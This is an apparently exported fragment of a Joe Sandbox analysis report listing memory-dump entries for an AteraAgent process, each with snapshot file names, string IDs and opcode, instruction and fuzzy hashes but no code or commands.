                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: dK_H
                                                                                                                                                                                                                                                                            • API String ID: 0-2901103952
                                                                                                                                                                                                                                                                            • Opcode ID: ffb1e3b8e39689cca489671cf106d7c0ae2d948da5eae5963a5550ae25d4ce93
                                                                                                                                                                                                                                                                            • Instruction ID: f89d6eec1fdec4bf796d9bc5ad539ab347fd05432207e6debd522d1dc59a394f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ffb1e3b8e39689cca489671cf106d7c0ae2d948da5eae5963a5550ae25d4ce93
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C02F57061DE498FD759DB2CC4546B97BE1FF9A300F14826ED48EC72A6CE24A886C7C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Hk6
                                                                                                                                                                                                                                                                            • API String ID: 0-3416695518
                                                                                                                                                                                                                                                                            • Opcode ID: eb2b997b220cbc29215413aa0d999651fa61b1d0218a221c6b0e9b8929272fc3
                                                                                                                                                                                                                                                                            • Instruction ID: 62bae4de32fb4e7bf87ab40e7247a0d9d8c4ec8f495274df12094e72eef3b390
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb2b997b220cbc29215413aa0d999651fa61b1d0218a221c6b0e9b8929272fc3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5E11670A1DB898FE754EB2CC055A69B7E2FF96340F50857DE08DC72A3CE24A845C782
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                            • Opcode ID: c96ee630fea068326bb3823f13d8f756ebde6530fcbea49ffdbb5ebb087508ac
                                                                                                                                                                                                                                                                            • Instruction ID: 7d534a84e6800cd21ee49a2941094e13c27996bb08da423821250fc09684ad10
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c96ee630fea068326bb3823f13d8f756ebde6530fcbea49ffdbb5ebb087508ac
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5BD1013161CB498BD728EB1CD4415B5B7E1FF96354B148ABDD08EC32A6DA25B882CBC1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                                                                                                            • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                            • Opcode ID: bffe4d47edd1c4c2909dd245eab49a2bc215b8f55a4773f91f58b6a63860f215
                                                                                                                                                                                                                                                                            • Instruction ID: 13a052f87040ec24d32d0902344309e301cdac92586b37b1eaa4d0fc5f03f2ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bffe4d47edd1c4c2909dd245eab49a2bc215b8f55a4773f91f58b6a63860f215
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18C12330A1DB898FE769DB18C440535B7E1FF96380B1486BDD08EC31A6DA25F886C781
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63
                                                                                                                                                                                                                                                                            • API String ID: 0-3819469774
                                                                                                                                                                                                                                                                            • Opcode ID: d69cd3ddea97a94cd63fc413f4a74e6040712ad70da413a1057587c834dadc6d
                                                                                                                                                                                                                                                                            • Instruction ID: dc74e8feed9317a28f813af09b73472d83a4ccefd72d2928145a1c3eb426e3b1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d69cd3ddea97a94cd63fc413f4a74e6040712ad70da413a1057587c834dadc6d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1818330A19A49CFDB98EB58C855BB83BE2FF59344F1442B8D45DD72A2CA34EC45C781
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: MG_H
                                                                                                                                                                                                                                                                            • API String ID: 0-2026589312
                                                                                                                                                                                                                                                                            • Opcode ID: c9e8a0ec35d957e5d8f6eb2f603d6c7b7e1abe150e3ebb0d4a5aff7893ac8030
                                                                                                                                                                                                                                                                            • Instruction ID: 2ab64846a21d5dbd6d6625c2bad6aa27f7f8e9e9edc12168d5d943c75450eb93
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9e8a0ec35d957e5d8f6eb2f603d6c7b7e1abe150e3ebb0d4a5aff7893ac8030
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07610A30B09D19CFDF98EB5CD498AB977E2FF69351B4040B9E14EDB2A1CE24AC458780
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: p[5
                                                                                                                                                                                                                                                                            • API String ID: 0-4051682499
                                                                                                                                                                                                                                                                            • Opcode ID: 88ce328955344c0104630f4695e11c1b63a8f1999235b16de8089fe6c82cc928
                                                                                                                                                                                                                                                                            • Instruction ID: 403ce9da5110168ea2ad4e335ab1e8a17f7bf509886cb4e75d312c6b80cbb556
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88ce328955344c0104630f4695e11c1b63a8f1999235b16de8089fe6c82cc928
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B71CF70D0A64D8FDB559B68D8216EDBFB0EF56340F1441BBD00DDB2A2CB38694AC7A1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: ^L_^
                                                                                                                                                                                                                                                                            • API String ID: 0-3269914177
                                                                                                                                                                                                                                                                            • Opcode ID: e8dd29893bc1e211f88f0f1f79dca3e637a31f4069378327f6931994175eb46d
                                                                                                                                                                                                                                                                            • Instruction ID: ebb38d0b766f16d42e8fc05649bcc8437e448771e0e1103f182d7c611b5f81f4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8dd29893bc1e211f88f0f1f79dca3e637a31f4069378327f6931994175eb46d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E51B367A4C7915FD302B77CE4661E83BF4EF8327570A45F7D089CA0A3E9182C4A8396
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: p[5
                                                                                                                                                                                                                                                                            • API String ID: 0-4051682499
                                                                                                                                                                                                                                                                            • Opcode ID: 0125629e9562388cff48319a38a7753040f8250a609e7338d12a8725a07aeae9
                                                                                                                                                                                                                                                                            • Instruction ID: 1010570bcd783ce0f83b5b0178b6268c592a5478a0247c102636a031faa12518
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0125629e9562388cff48319a38a7753040f8250a609e7338d12a8725a07aeae9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0751E57090A7888FDB45DB68C8216EDBFF0EF16340F1441BBD04DDB2A2CB28194AC7A1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: kq
                                                                                                                                                                                                                                                                            • API String ID: 0-1161455450
                                                                                                                                                                                                                                                                            • Opcode ID: 182a69ced68133fdf4faa221e6c77b3714ffb455de0075f4b1802d0dde10be95
                                                                                                                                                                                                                                                                            • Instruction ID: 45e2eebdf6e2cb955a98973e5b665933212379b5b12ae03b6007f9681d312ca7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 182a69ced68133fdf4faa221e6c77b3714ffb455de0075f4b1802d0dde10be95
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B41D52171EB898FF35AA73C98506757BE1EF97244B1841FBE04DCB2A3CC155C8583A2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0p=
                                                                                                                                                                                                                                                                            • API String ID: 0-2527772663
                                                                                                                                                                                                                                                                            • Opcode ID: 82209ec155e6ba32c6c767a9fcdcdff4ef7be007d5600e6e9295236843fdc299
                                                                                                                                                                                                                                                                            • Instruction ID: 2d027ea7b2268e80fccf52419f2a12200240090551f76661807587d55d536cae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82209ec155e6ba32c6c767a9fcdcdff4ef7be007d5600e6e9295236843fdc299
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C0411A3270AA094FD784EB2CE814BB9B7D1EFE9355F4442BAE44DC73A2DD19984583C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: p[5
                                                                                                                                                                                                                                                                            • API String ID: 0-4051682499
                                                                                                                                                                                                                                                                            • Opcode ID: 8ef246300c6c95c4836097421a8e98e38c61add621e6c07f2a705e2eaf90de25
                                                                                                                                                                                                                                                                            • Instruction ID: b201703b010b58f372330d9bdd76d484affc13a3cf3fe6511ddbc7f85e07661a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef246300c6c95c4836097421a8e98e38c61add621e6c07f2a705e2eaf90de25
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0417C71D0978D8FDB58DB68C4556ADBBF1FF56340F14417AE00DD72A2CA38684ACB90
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: yb_H
                                                                                                                                                                                                                                                                            • API String ID: 0-956606333
                                                                                                                                                                                                                                                                            • Opcode ID: 8bfc1634ff3446ac1d505aeef29a0c03fbe6be073af2ffa12c5f5d5df3271878
                                                                                                                                                                                                                                                                            • Instruction ID: 3f86f8a19f2af1e2b477859485f3dc2ace899a4972d41043d311564d3fb4bc2e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bfc1634ff3446ac1d505aeef29a0c03fbe6be073af2ffa12c5f5d5df3271878
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72412C61A0E6859FE795D72C848D7B97BD1EF96340F4845FDC08CCB1B2DA34A84AC381
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 8h5
                                                                                                                                                                                                                                                                            • API String ID: 0-2314399704
                                                                                                                                                                                                                                                                            • Opcode ID: 48b9992bb27812d0c016fcde65a9b0fa924b227cae7746da8e0f03929eed597a
                                                                                                                                                                                                                                                                            • Instruction ID: dd650db1ffceec487a3149b939198fa7228bb7472f8ebbc1d89db7242e1051c2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48b9992bb27812d0c016fcde65a9b0fa924b227cae7746da8e0f03929eed597a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3415B77A086499BE354F76CE8665F9B7E4FF81326F0401BBE00CC61A3DD2428868BC1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: X`=
                                                                                                                                                                                                                                                                            • API String ID: 0-1948173163
                                                                                                                                                                                                                                                                            • Opcode ID: ba9b3de6dd0ad70c5e61bb4fde6e3ede9603e9b51e49da6d10faa9912fc77883
                                                                                                                                                                                                                                                                            • Instruction ID: 72303001c6bee46ea8e42bb2db7f865aba226c9378e358f3011d1e10c78680db
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba9b3de6dd0ad70c5e61bb4fde6e3ede9603e9b51e49da6d10faa9912fc77883
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231F370B1DA099FE768DB1C986957DB7E1EF9A351B1441BEE04DC32A3CE20AC0687C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: tL_^
                                                                                                                                                                                                                                                                            • API String ID: 0-225026331
                                                                                                                                                                                                                                                                            • Opcode ID: 9101fdada49bfdf323b003a65790a7a5c969ba1061798b88c72ec983b206cad2
                                                                                                                                                                                                                                                                            • Instruction ID: 6ab5ce3c1aff9606df823a9bbd4ca659316ca02248e04867b5540f958ee25bfa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9101fdada49bfdf323b003a65790a7a5c969ba1061798b88c72ec983b206cad2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31AE27D0C656ABE701B73CE8994FA7BE4EF82365B094177D04DCA0B3DE14644A86C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /3
                                                                                                                                                                                                                                                                            • API String ID: 0-2516180287
                                                                                                                                                                                                                                                                            • Opcode ID: bca7ae55d189db41a5742240d1c7b742ef428931d5558a3a0d8b0ea16db3572a
                                                                                                                                                                                                                                                                            • Instruction ID: 7e05a3e2fd7ce51acc15534db028ef4f93781df6fe6980c68aa0f97c284a8efe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bca7ae55d189db41a5742240d1c7b742ef428931d5558a3a0d8b0ea16db3572a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F314330A18E128FE369C778D490AB177D1EF55300F14807CC0AEC32A6EA29B88AC7C0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: r63
                                                                                                                                                                                                                                                                            • API String ID: 0-1294201789
                                                                                                                                                                                                                                                                            • Opcode ID: 514cafc1d9ea88b6e517f49e01e4603dba05b649d294806a2f0f16b5e73ec01e
                                                                                                                                                                                                                                                                            • Instruction ID: 2ddb1a07e6814de6dd864097f3f73513aef826d7afa6d2448f5a5df3c550e370
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 514cafc1d9ea88b6e517f49e01e4603dba05b649d294806a2f0f16b5e73ec01e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15212672B0DA098FE758AB6CA8421B973D1EFC6365B44027FE14DC32B2DD15B80A47C5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 8h5
                                                                                                                                                                                                                                                                            • API String ID: 0-2314399704
                                                                                                                                                                                                                                                                            • Opcode ID: a0be51db5e04a47a9ac18b7b2a87c3f5e41ef1110a2251825f5367496d447ed8
                                                                                                                                                                                                                                                                            • Instruction ID: ce4df74c43caad0e063fcf6b1e3ac2adbe8c3270caf00068c0853ece17741a2e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0be51db5e04a47a9ac18b7b2a87c3f5e41ef1110a2251825f5367496d447ed8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8219EB191DA89CFE799DB68C8656A9BBF1FF56341F0001BAE04DC21A2DE341946CB81
                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 5625312bbb72f2e32b7836e21a33a7676f95d932659393714f7b9ae0b979fa43
                                                                                                                                                                                                                                                                            • Instruction ID: 596a7da3357c907b978fc37e19eace0fc2389f4d6773d7c94b081da0d1e2463f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5625312bbb72f2e32b7836e21a33a7676f95d932659393714f7b9ae0b979fa43
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19C10362A0EBC69FE756A7ACD8651F83FE0FF56250B0840F7D048DB0A3D919584AC3D2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f99ed297177bca6424011a883554e5ac59245e70f583a0b35a2c94747cc0ee7c
                                                                                                                                                                                                                                                                            • Instruction ID: a7a1a167543831d734819c944963b607d666ca92a11c1143e76fb766210a8fb2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f99ed297177bca6424011a883554e5ac59245e70f583a0b35a2c94747cc0ee7c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90C10362A0EBC59FE756A7ACD8651F83FE0FF56250B0840F7D048DB0A7D915584AC3D2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 71d21183eb200aaf97981063c8499b30232e4e36559f93a3150df9fa32b6f0cb
                                                                                                                                                                                                                                                                            • Instruction ID: d8f91441cbd0ba573aeb728f5182db8d765347a085a4034d5b748912efcf7951
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71d21183eb200aaf97981063c8499b30232e4e36559f93a3150df9fa32b6f0cb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4C10262A0EBC69FE756A7ACD8651F83FE0FF56250B0840F6D048DB0A7D925584AC3D2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 94a9bc51c776e8ed89f788cb701456c0030468fefab134c8ac35d526bb99da25
                                                                                                                                                                                                                                                                            • Instruction ID: fcf8edf5107f897a217b2a271c9d797206137366f60d8b44eb5cee5248796fd8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94a9bc51c776e8ed89f788cb701456c0030468fefab134c8ac35d526bb99da25
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAC1E33091D6928BF36C9B58D451679B7E0EF46704F14847DD4DFC72A2CA38B84A8792
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1047f23d5f27cdc10e9c56b30a000d47920c26c4daec8119585c469b993538d3
                                                                                                                                                                                                                                                                            • Instruction ID: 4c36a4f5cd422b00690dbe06724228aa7bd529642fd859e981d111ab79a13409
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1047f23d5f27cdc10e9c56b30a000d47920c26c4daec8119585c469b993538d3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B841352260E7C69FE356E76C98A54A83FA4EF53250B0842F7D48CCB0B3D908684DC3A1
                                                                                                                                                                                                                                                                            Memory Dump Source
